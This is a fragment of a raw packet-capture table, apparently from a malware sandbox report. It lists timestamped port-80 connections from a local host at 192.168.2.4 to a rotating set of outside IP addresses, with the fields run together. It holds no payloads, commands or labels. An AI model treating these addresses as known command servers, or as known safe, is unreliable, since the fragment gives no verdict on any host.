                                                          Jul 3, 2024 15:57:05.291173935 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.291183949 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.291202068 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.291212082 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.291251898 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.759968996 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.760221004 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.760262966 CEST4974080192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:05.765393972 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.765445948 CEST4974080192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:06.791853905 CEST4974080192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:07.811968088 CEST4974180192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:07.818739891 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:07.818821907 CEST4974180192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:07.820550919 CEST4974180192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:07.825418949 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:08.515039921 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:08.515057087 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:08.515065908 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:08.515222073 CEST4974180192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:08.515571117 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:08.515613079 CEST4974180192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:08.517859936 CEST4974180192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:08.519464016 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:08.519521952 CEST4974180192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:08.522744894 CEST804974176.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:13.901796103 CEST4974280192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:13.906768084 CEST804974235.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:13.906872034 CEST4974280192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:13.908701897 CEST4974280192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:13.913640976 CEST804974235.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:14.567435026 CEST804974235.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:14.567460060 CEST804974235.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:14.567599058 CEST4974280192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:15.416836023 CEST4974280192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:16.435098886 CEST4974380192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:16.440486908 CEST804974335.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:16.440582037 CEST4974380192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:16.442389965 CEST4974380192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:16.447240114 CEST804974335.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:17.101556063 CEST804974335.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:17.101614952 CEST804974335.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:17.101628065 CEST804974335.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:17.101748943 CEST4974380192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:17.947868109 CEST4974380192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:18.966308117 CEST4974480192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:18.971263885 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.971345901 CEST4974480192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:18.973505020 CEST4974480192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:18.978646040 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.978739023 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.978748083 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.980231047 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.980241060 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.980248928 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.980258942 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.980268002 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:18.980277061 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:19.728038073 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:19.728055954 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:19.728065968 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:19.728101969 CEST804974435.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:19.728167057 CEST4974480192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:19.728218079 CEST4974480192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:20.484636068 CEST4974480192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:21.497679949 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:21.502732038 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:21.502840042 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:21.504600048 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:21.509434938 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.139457941 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.152919054 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.152940035 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.152954102 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.153000116 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:22.153023958 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.153037071 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.153038025 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:22.153070927 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:22.153121948 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:22.153136015 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:22.155525923 CEST4974580192.168.2.435.244.172.47
                                                          Jul 3, 2024 15:57:22.161191940 CEST804974535.244.172.47192.168.2.4
                                                          Jul 3, 2024 15:57:27.384366989 CEST4974680192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:27.389374971 CEST8049746154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:27.389451027 CEST4974680192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:27.391318083 CEST4974680192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:27.397469044 CEST8049746154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:28.431289911 CEST8049746154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:28.431312084 CEST8049746154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:28.431327105 CEST8049746154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:28.431337118 CEST8049746154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:28.431374073 CEST4974680192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:28.431415081 CEST4974680192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:28.901094913 CEST4974680192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:29.919611931 CEST4974780192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:29.925380945 CEST8049747154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:29.925478935 CEST4974780192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:29.927300930 CEST4974780192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:29.933676004 CEST8049747154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:30.833509922 CEST8049747154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:30.833620071 CEST8049747154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:30.833698034 CEST8049747154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:30.833736897 CEST4974780192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:30.833798885 CEST4974780192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:31.432377100 CEST4974780192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:32.466870070 CEST4974880192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:33.168495893 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.168613911 CEST4974880192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:33.170799017 CEST4974880192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:33.175786972 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.175839901 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.175852060 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.175884962 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.175895929 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.175910950 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.175920963 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.176013947 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:33.176024914 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:34.069240093 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:34.069585085 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:34.069638968 CEST4974880192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:34.069698095 CEST8049748154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:34.069742918 CEST4974880192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:34.683248997 CEST4974880192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:35.700834036 CEST4974980192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:35.705790043 CEST8049749154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:35.705950975 CEST4974980192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:35.711591005 CEST4974980192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:35.718061924 CEST8049749154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:36.616875887 CEST8049749154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:36.616898060 CEST8049749154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:36.617099047 CEST4974980192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:36.617233992 CEST8049749154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:36.617283106 CEST4974980192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:36.622001886 CEST4974980192.168.2.4154.23.7.170
                                                          Jul 3, 2024 15:57:36.626852989 CEST8049749154.23.7.170192.168.2.4
                                                          Jul 3, 2024 15:57:41.694245100 CEST4975080192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:41.699208975 CEST8049750203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:41.699945927 CEST4975080192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:41.703834057 CEST4975080192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:41.708698034 CEST8049750203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:43.213464975 CEST4975080192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:43.219063044 CEST8049750203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:43.219571114 CEST4975080192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:44.242527008 CEST4975180192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:44.248574972 CEST8049751203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:44.248653889 CEST4975180192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:44.253186941 CEST4975180192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:44.258753061 CEST8049751203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:44.948184013 CEST8049751203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:44.948302031 CEST8049751203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:44.948360920 CEST4975180192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:45.760456085 CEST4975180192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:46.880500078 CEST4975280192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:46.886045933 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.886118889 CEST4975280192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:46.889579058 CEST4975280192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:46.894587040 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894601107 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894615889 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894624949 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894634008 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894669056 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894679070 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894712925 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:46.894722939 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:48.401042938 CEST4975280192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:48.409173012 CEST8049752203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:48.409260035 CEST4975280192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:49.421834946 CEST4975380192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:49.426839113 CEST8049753203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:49.427007914 CEST4975380192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:49.428736925 CEST4975380192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:49.433603048 CEST8049753203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:51.156693935 CEST8049753203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:51.156747103 CEST8049753203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:51.156892061 CEST4975380192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:51.159954071 CEST4975380192.168.2.4203.161.41.205
                                                          Jul 3, 2024 15:57:51.164866924 CEST8049753203.161.41.205192.168.2.4
                                                          Jul 3, 2024 15:57:56.190304995 CEST4975480192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:56.200942039 CEST8049754104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:56.201010942 CEST4975480192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:56.202965021 CEST4975480192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:56.208302021 CEST8049754104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:57.156107903 CEST8049754104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:57.157102108 CEST8049754104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:57.159946918 CEST4975480192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:57.713838100 CEST4975480192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:58.733539104 CEST4975580192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:58.738554955 CEST8049755104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:58.738626957 CEST4975580192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:58.741971970 CEST4975580192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:57:58.746809006 CEST8049755104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:59.675770044 CEST8049755104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:59.676229000 CEST8049755104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:57:59.676281929 CEST4975580192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:00.245143890 CEST4975580192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:01.263881922 CEST4975680192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:01.269619942 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.269902945 CEST4975680192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:01.272028923 CEST4975680192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:01.276932955 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.276946068 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.276962996 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.276972055 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.276983023 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.277242899 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.277251959 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.277292967 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:01.277334929 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:02.164757967 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:02.165968895 CEST8049756104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:02.166019917 CEST4975680192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:02.776052952 CEST4975680192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:03.795787096 CEST4975780192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:03.800710917 CEST8049757104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:03.800806046 CEST4975780192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:03.808232069 CEST4975780192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:03.813158035 CEST8049757104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:04.726861954 CEST8049757104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:04.729216099 CEST8049757104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:04.729343891 CEST4975780192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:04.730140924 CEST4975780192.168.2.4104.21.84.69
                                                          Jul 3, 2024 15:58:04.736525059 CEST8049757104.21.84.69192.168.2.4
                                                          Jul 3, 2024 15:58:09.950016022 CEST4975880192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:09.955337048 CEST804975874.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:09.957931042 CEST4975880192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:09.960850954 CEST4975880192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:09.965815067 CEST804975874.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:10.505834103 CEST804975874.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:10.505983114 CEST804975874.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:10.506047964 CEST4975880192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:11.463502884 CEST4975880192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:12.492522001 CEST4975980192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:12.497605085 CEST804975974.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:12.497684002 CEST4975980192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:12.500266075 CEST4975980192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:12.505079031 CEST804975974.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:13.017472029 CEST804975974.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:13.017713070 CEST804975974.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:13.017807007 CEST4975980192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:14.010502100 CEST4975980192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:15.028779984 CEST4976080192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:15.033807993 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.033912897 CEST4976080192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:15.035931110 CEST4976080192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:15.040873051 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.040884018 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.040893078 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.040901899 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.040919065 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.040997028 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.041294098 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.041636944 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.042002916 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.603627920 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.604619026 CEST804976074.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:15.604805946 CEST4976080192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:16.541901112 CEST4976080192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:17.559940100 CEST4976180192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:17.565288067 CEST804976174.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:17.566044092 CEST4976180192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:17.569860935 CEST4976180192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:17.574685097 CEST804976174.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:18.095403910 CEST804976174.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:18.095921993 CEST804976174.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:18.095968008 CEST4976180192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:18.098647118 CEST4976180192.168.2.474.208.236.38
                                                          Jul 3, 2024 15:58:18.104140997 CEST804976174.208.236.38192.168.2.4
                                                          Jul 3, 2024 15:58:23.512324095 CEST4976280192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:23.517250061 CEST804976238.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:23.519548893 CEST4976280192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:23.521548986 CEST4976280192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:23.527015924 CEST804976238.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:24.427017927 CEST804976238.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:24.427207947 CEST804976238.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:24.427262068 CEST4976280192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:25.026294947 CEST4976280192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:26.045864105 CEST4976380192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:26.050806046 CEST804976338.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:26.053977966 CEST4976380192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:26.057864904 CEST4976380192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:26.062694073 CEST804976338.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:26.956707954 CEST804976338.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:26.957384109 CEST804976338.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:26.957443953 CEST4976380192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:27.557301044 CEST4976380192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:28.577056885 CEST4976480192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:28.582065105 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.582139015 CEST4976480192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:28.584786892 CEST4976480192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:28.590076923 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590101957 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590116024 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590133905 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590145111 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590153933 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590164900 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590301037 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:28.590312004 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:29.505669117 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:29.510858059 CEST804976438.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:29.511291027 CEST4976480192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:30.088769913 CEST4976480192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:31.107223034 CEST4976580192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:31.113919973 CEST804976538.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:31.114136934 CEST4976580192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:31.116873026 CEST4976580192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:31.121731043 CEST804976538.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:32.119332075 CEST804976538.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:32.119391918 CEST804976538.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:32.119450092 CEST804976538.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:32.119478941 CEST4976580192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:32.119538069 CEST4976580192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:32.123529911 CEST4976580192.168.2.438.47.232.185
                                                          Jul 3, 2024 15:58:32.129256964 CEST804976538.47.232.185192.168.2.4
                                                          Jul 3, 2024 15:58:45.289884090 CEST4976680192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:45.295089006 CEST804976646.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:45.299827099 CEST4976680192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:45.299827099 CEST4976680192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:45.304742098 CEST804976646.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:46.290000916 CEST804976646.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:46.290035963 CEST804976646.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:46.290081978 CEST804976646.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:46.290090084 CEST4976680192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:46.290137053 CEST4976680192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:46.290860891 CEST804976646.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:46.290915966 CEST4976680192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:46.807317019 CEST4976680192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:47.825879097 CEST4976780192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:47.831928015 CEST804976746.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:47.833996058 CEST4976780192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:47.837883949 CEST4976780192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:47.844000101 CEST804976746.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:48.459342003 CEST804976746.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:48.459364891 CEST804976746.30.211.38192.168.2.4
